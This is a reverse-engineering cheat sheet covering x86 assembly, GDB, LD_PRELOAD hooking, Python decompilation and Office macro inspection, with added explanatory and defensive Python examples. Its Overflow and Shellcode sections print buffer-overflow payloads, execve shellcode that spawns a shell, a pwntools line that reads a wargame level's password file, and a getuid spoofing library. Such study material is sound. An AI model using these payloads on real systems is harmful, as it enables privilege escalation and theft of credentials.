ReverseEngineering
ASM
Variables

| x64 | x32 | What is it? |
|---|---|---|
| RAX | EAX | Return value |
| RCX | ECX | Counter (or fourth arg) |
| RDX | EDX | Third arg |
| RSI | ESI | Second arg |
| RDI | EDI | First arg of function |
| RSP | ESP | Stack pointer |
| RIP | EIP | Next instruction |
| R8-R11 | r8d-r11d | Scratch register |
| R12-R15 | r12d-r15d | Preserved register |
Operation

| Operation | Explanation |
|---|---|
| MOV size dest,src | dest ← src |
| LEA dest,[op] | dest ← addr op (address arithmetic only, memory is not read) |
| PUSH op | Decrease RSP & store op |
| POP op | Load op & increase RSP |
| ADD op1,op2 | op1 ← op1 + op2 |
| SUB op1,op2 | op1 ← op1 - op2 |
| NEG reg | reg ← -reg |
| INC reg | reg ← reg + 1 |
| DEC reg | reg ← reg - 1 |
| AND op1,op2 | op1 ← op1 & op2 |
| OR op1,op2 | op1 ← op1 \| op2 |
| XOR op1,op2 | op1 ← op1 ^ op2 |
| CMP op1,op2 | op1 - op2 (result discarded, only the flags are set) |
| TEST op1,op2 | op1 & op2 (result discarded, only the flags are set) |
| JMP op | Jump to op |
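The table above is easiest to internalise by seeing what each instruction does to the flags and to RSP. The following is an added example, not code from the original page: a small Python model of the listed instructions (the register set, the flat stack memory and the ZF/SF/CF/OF subset are my simplification), showing that CMP and TEST only set flags, that conditional jumps read nothing but those flags (signed `jl` vs unsigned `jb`), that LEA never touches memory, and that PUSH lowers RSP before storing while POP loads before raising it.

```python
MASK64 = (1 << 64) - 1


def _sign(v: int) -> int:
    """Bit 63 of a 64-bit value."""
    return (v >> 63) & 1


class CPU:
    """Registers, a constructed flat stack memory and the flags the table's instructions touch."""

    def __init__(self, rsp: int = 0x7FFF_0000):
        self.regs = {r: 0 for r in ("rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9")}
        self.regs["rsp"] = rsp
        self.mem = {}  # address -> 8-byte value; only the stack lives here
        self.flags = {"ZF": 0, "SF": 0, "CF": 0, "OF": 0}

    def _val(self, x):
        """Operand is either a register name or an immediate (wrapped to 64 bits)."""
        return self.regs[x] if isinstance(x, str) else x & MASK64

    def _flags_arith(self, a, b, res, sub):
        """Flags for ADD/SUB/CMP: ZF/SF from the result, CF = unsigned carry/borrow, OF = signed overflow."""
        r = res & MASK64
        sa, sb, sr = _sign(a), _sign(b), _sign(r)
        self.flags["ZF"] = int(r == 0)
        self.flags["SF"] = sr
        if sub:
            self.flags["CF"] = int(a < b)
            self.flags["OF"] = int(sa != sb and sr != sa)
        else:
            self.flags["CF"] = int(res > MASK64)
            self.flags["OF"] = int(sa == sb and sr != sa)
        return r

    def _flags_logic(self, r):
        """Flags for AND/OR/XOR/TEST: CF and OF are always cleared."""
        self.flags.update(ZF=int(r == 0), SF=_sign(r), CF=0, OF=0)
        return r

    # data movement
    def mov(self, dst, src):
        self.regs[dst] = self._val(src)

    def lea(self, dst, base, index=None, scale=1, disp=0):
        # [base + index*scale + disp] is computed, never dereferenced
        addr = self.regs[base] + (self.regs[index] * scale if index else 0) + disp
        self.regs[dst] = addr & MASK64

    def push(self, src):
        self.regs["rsp"] -= 8                        # RSP goes down first ...
        self.mem[self.regs["rsp"]] = self._val(src)  # ... then the value is stored there

    def pop(self, dst):
        self.regs[dst] = self.mem[self.regs["rsp"]]  # load from the top of the stack ...
        self.regs["rsp"] += 8                        # ... then RSP goes back up

    # arithmetic / logic
    def add(self, dst, src):
        a, b = self.regs[dst], self._val(src)
        self.regs[dst] = self._flags_arith(a, b, a + b, sub=False)

    def sub(self, dst, src):
        a, b = self.regs[dst], self._val(src)
        self.regs[dst] = self._flags_arith(a, b, a - b, sub=True)

    def cmp(self, op1, op2):
        a, b = self._val(op1), self._val(op2)
        self._flags_arith(a, b, a - b, sub=True)     # like SUB, but the result is dropped

    def xor(self, dst, src):
        self.regs[dst] = self._flags_logic(self.regs[dst] ^ self._val(src))

    def test(self, op1, op2):
        self._flags_logic(self._val(op1) & self._val(op2))  # like AND, result dropped

    # conditional jumps read only the flags
    def je(self) -> bool:
        return self.flags["ZF"] == 1

    def jb(self) -> bool:      # unsigned "below"
        return self.flags["CF"] == 1

    def jl(self) -> bool:      # signed "less"
        return self.flags["SF"] != self.flags["OF"]


if __name__ == "__main__":
    cpu = CPU()
    cpu.mov("rax", -1)
    cpu.cmp("rax", 1)
    print("after cmp rax(-1),1: jl =", cpu.jl(), "jb =", cpu.jb())   # signed yes, unsigned no
    cpu.push("rax")
    print("rsp after push:", hex(cpu.regs["rsp"]))
```

The `-1` versus `1` comparison is the case worth remembering when reading a decompiled bounds check: the same CMP makes `jl` taken and `jb` not taken, so which jump follows it tells you whether the compiler treated the length as signed or unsigned.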
Overflow

| Type | Payload |
|---|---|
| Basic | `(python -c "import struct; print('A' * (100 - 0) + struct.pack('<I', 0xffffffff))")` |
| Shellcode | `(python -c "import struct; print('\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80' + 'A' * (100 - 21) + struct.pack('<I', 0xffffffff))")` |

Both one-liners are Python 2: there `print` writes the `str` unchanged and `struct.pack` returns a `str` that concatenates with it; under Python 3 the `str + bytes` concatenation raises a `TypeError`.
Shellcode

| Name | Shellcode | Size |
|---|---|---|
| Cat | `python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.cat('/home/users/level05/.pass')); print(shell); print(len(shell))"` | printed by `len(shell)` |
| Exec sh 1 | `python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.sh()); print(shell); print(len(shell))"` | printed by `len(shell)` |
| Exec sh 2 | `\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80` | 21 |
GDB

Command

| Command | Description |
|---|---|
| `b *0x12345678` | Breakpoint at an address |
| `b strcpy` | Breakpoint on a function |
| `r` | Run program |
| `r < <(echo lol)` | Run with stdin fed from a process substitution |
| `r arg1 arg2` | Run with arguments |
| `c` | Continue |
| `n` | Next operation (step over) |
| `set $eax=0x00` | Set a register |
| `info register` | Show registers |

Print

| Command | Description |
|---|---|
| `x/s "string"` | Examine as a string |
| `x/d 53` | Examine as decimal |
| `x/x 0xff` | Examine as hex |
| `help x` | Help for the `x` (examine) command |
| `print $rax` | Print a register |

Get env address

| Command | Description |
|---|---|
| `x/10s **(char***)&environ` | Print the first 10 environment strings with their addresses |
Peda

Install

```shell
git clone https://github.com/longld/peda.git ~/.peda
echo "source ~/.peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"
```
Binary ninja

Scrape code from HTML

```javascript
// Run in the browser console on a Binary Ninja HTML view: concatenate the
// text of every linear disassembly line into one string, one line per row.
let result = '';
[...document.querySelectorAll('.LinearDisassemblyLine')].forEach(parent_elmt => {
    [...parent_elmt.children].forEach(children_elmt => {
        result += children_elmt.textContent;
    });
    result += '\n';
});
console.log(result);
```
Lib Injection

Recreate getuid function

```c
#include <sys/types.h>
#include <unistd.h>

/* Same signature as libc's getuid(); with LD_PRELOAD this copy is resolved
   first, so every getuid() call in the target returns 4242. */
uid_t getuid(void)
{
    return (4242);
}
```

compile

```shell
gcc -shared -fpic lib.c -o libnike.so -m32   # 32-bit object; drop -m32 for a 64-bit target
```

run and inject

```shell
LD_PRELOAD=./libnike.so ./exec
```
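The same mechanism is what a defender looks for when a binary behaves as if it were running as another user. The following is an added example, not code from the original page: a Python audit that parses `LD_PRELOAD` the way the dynamic loader does (colon- or whitespace-separated) and walks `/proc/<pid>/maps` for file-backed shared objects loaded from outside the usual library trees. The `TRUSTED_PREFIXES` list is an assumption to adjust per distribution, and `SAMPLE_MAPS` is a constructed maps excerpt that includes the `libnike.so` from this page.

```python
import os
import re
from typing import Dict, Iterable, List, Optional, Set

# Assumption: legitimate shared objects normally live under these trees; anything
# mapped from a home directory, /tmp or the working directory deserves a look.
TRUSTED_PREFIXES = ("/lib", "/lib64", "/usr/lib", "/usr/lib64", "/usr/local/lib")


def parse_ld_preload(value: Optional[str]) -> List[str]:
    """LD_PRELOAD is a list separated by colons or whitespace; return its non-empty entries."""
    if not value:
        return []
    return [entry for entry in re.split(r"[:\s]+", value.strip()) if entry]


def mapped_libraries(maps_text: str) -> Set[str]:
    """Collect file-backed shared objects from /proc/<pid>/maps text (the 6th field is the path)."""
    libs = set()
    for line in maps_text.splitlines():
        fields = line.split(maxsplit=5)
        if len(fields) == 6 and fields[5].startswith("/") and ".so" in fields[5]:
            libs.add(fields[5])
    return libs


def untrusted_libraries(libs: Iterable[str]) -> List[str]:
    """Mapped libraries whose path is outside every trusted prefix, sorted for stable output."""
    return sorted(lib for lib in libs if not lib.startswith(TRUSTED_PREFIXES))


def audit(ld_preload: Optional[str], maps_text: str) -> Dict[str, List[str]]:
    """Pure function so it can run on captured data; audit_self() feeds it live values."""
    return {
        "preload": parse_ld_preload(ld_preload),
        "untrusted": untrusted_libraries(mapped_libraries(maps_text)),
    }


def audit_self() -> Dict[str, List[str]]:
    """Audit the running process (Linux only; the maps part is empty elsewhere)."""
    try:
        with open("/proc/self/maps") as fh:
            maps_text = fh.read()
    except OSError:
        maps_text = ""
    return audit(os.environ.get("LD_PRELOAD"), maps_text)


# Constructed sample: libc from the system tree plus the page's injected library
# loaded from a home directory, and a non-file mapping that must be ignored.
SAMPLE_MAPS = """\
7f0000000000-7f00001e0000 r-xp 00000000 08:01 1234 /usr/lib/x86_64-linux-gnu/libc.so.6
7f0000200000-7f0000201000 r-xp 00000000 08:01 5678 /home/user/libnike.so
7ffd00000000-7ffd00021000 rw-p 00000000 00:00 0    [stack]
"""

if __name__ == "__main__":
    print(audit("./libnike.so", SAMPLE_MAPS))
    print(audit_self())
```

Checking the maps rather than only the environment matters because a hooked process may have had `LD_PRELOAD` cleared after startup (or set through `/etc/ld.so.preload` instead), while the injected object stays mapped for the life of the process.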
Decompile Python Executable

Convert executable into .pyc

```shell
git clone https://github.com/extremecoders-re/pyinstxtractor
cd pyinstxtractor
python3 pyinstxtractor.py exec   # unpacks the bundled .pyc files into exec_extracted/
```

Disassemble .pyc (compatible with Python 3.9.2)

```shell
git clone https://github.com/zrax/pycdc
cd pycdc
cmake .
make
./pycdc file.pyc    # Convert .pyc into .py
./pycdas file.pyc   # Convert .pyc into byte-code disassembly
```
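The version caveat above comes from the `.pyc` header: the first four bytes are a magic number tied to the interpreter's bytecode format, which is why `pycdc` needs a matching Python. The following is an added example, not code from the original page or from the pycdc project: it builds a `.pyc` in memory for the running interpreter from a constructed snippet, checks the magic before unmarshalling (refusing foreign bytecode instead of feeding it to `marshal`), reads the PEP 552 flags word, and lists the opcodes with the standard library's `dis`, which gives a `pycdas`-style disassembly without any external tool. `SAMPLE_SOURCE` and the zeroed timestamp are constructed values.

```python
import dis
import importlib.util
import marshal
import struct

PYC_HEADER_LEN = 16  # CPython >= 3.7: magic(4) + flags(4) + mtime-or-hash(8)


def build_pyc(source: str, filename: str = "sample.py") -> bytes:
    """Compile `source` into an in-memory, timestamp-based .pyc for the running interpreter."""
    code = compile(source, filename, "exec")
    # flags=0 (timestamp based), mtime=0, source size: constructed header values
    header = importlib.util.MAGIC_NUMBER + struct.pack("<III", 0, 0, len(source))
    return header + marshal.dumps(code)


def pyc_magic_matches(data: bytes) -> bool:
    """True when the file was produced for the same bytecode version as this interpreter."""
    return data[:4] == importlib.util.MAGIC_NUMBER


def parse_pyc(data: bytes) -> dict:
    """Split header from body and unmarshal the module code object.

    Raises ValueError on a magic mismatch rather than unmarshalling foreign bytecode;
    that mismatch is the situation in which pycdc needs a matching Python version.
    """
    if len(data) < PYC_HEADER_LEN:
        raise ValueError("truncated pyc header")
    if not pyc_magic_matches(data):
        raise ValueError("magic %r does not match this interpreter" % data[:4])
    (flags,) = struct.unpack("<I", data[4:8])
    hash_based = bool(flags & 1)  # PEP 552 bit 0: hash-based invalidation instead of mtime
    code = marshal.loads(data[PYC_HEADER_LEN:])
    return {"hash_based": hash_based, "code": code}


def opnames(code) -> list:
    """Flat list of opcode names for the module body, via stdlib dis (pycdas-style view)."""
    return [ins.opname for ins in dis.get_instructions(code)]


SAMPLE_SOURCE = "x = 1\nprint(x)\n"  # constructed input

if __name__ == "__main__":
    info = parse_pyc(build_pyc(SAMPLE_SOURCE))
    print("hash-based pyc:", info["hash_based"])
    print("names referenced:", info["code"].co_names)
    dis.dis(info["code"])
```

Running it on a `.pyc` that `pyinstxtractor` produced is a matter of passing `open(path, "rb").read()` to `parse_pyc`; a `ValueError` on the magic tells you immediately which interpreter version to install before reaching for `pycdc`.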
Macro Office PPTM

Install

```shell
sudo pip3 install oletools
```

Show the VBA macro source of a PPTM (olevba decompresses the compressed VBA streams)

```shell
olevba -c file.pptm
```
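Before decompressing anything, the first question is whether a file carries VBA at all, and the extension cannot be trusted for that. The following is an added example, not code from the original page or from oletools: a `.pptm` (like any OOXML document) is a zip, so the check opens it with the standard library, looks for a `vbaProject.bin` part, confirms that part starts with the OLE2 container magic, and reads `[Content_Types].xml` for the `vbaProject` content type. `build_sample_pptm` constructs a minimal zip with that structure so the scan runs offline; it is not a real PowerPoint file.

```python
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE2 / CFB container header
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
CONTENT_TYPES_PART = "[Content_Types].xml"


def find_vba_parts(data: bytes) -> dict:
    """Inspect an OOXML zip for embedded VBA, whatever the file extension claims."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        parts = [n for n in names if n.lower().endswith("vbaproject.bin")]
        # a vbaProject.bin that is not an OLE container is itself worth a look
        ole_valid = all(zf.read(p)[:8] == OLE_MAGIC for p in parts)
        declared = False
        if CONTENT_TYPES_PART in names:
            content_types = zf.read(CONTENT_TYPES_PART).decode("utf-8", "replace")
            declared = VBA_CONTENT_TYPE in content_types
    return {"parts": parts, "declared": declared, "ole_valid": ole_valid}


def has_macros(data: bytes) -> bool:
    """True when at least one VBA project part is present."""
    return bool(find_vba_parts(data)["parts"])


def build_sample_pptm(with_macro: bool) -> bytes:
    """Constructed minimal OOXML zip: enough structure to scan, not a real presentation."""
    override = (
        '<Override PartName="/ppt/vbaProject.bin" ContentType="%s"/>' % VBA_CONTENT_TYPE
        if with_macro
        else ""
    )
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        + override
        + "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(CONTENT_TYPES_PART, content_types)
        zf.writestr("ppt/presentation.xml", "<presentation/>")
        if with_macro:
            # placeholder: OLE header magic followed by padding, no real VBA streams
            zf.writestr("ppt/vbaProject.bin", OLE_MAGIC + b"\x00" * 504)
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        print("macro" if flag else "clean", "->", find_vba_parts(build_sample_pptm(flag)))
```

Once `has_macros` says yes, `olevba` is the tool for reading the actual code; a file whose content types declare no VBA but which still ships a `vbaProject.bin` (or the reverse) is a mismatch worth recording before opening it anywhere.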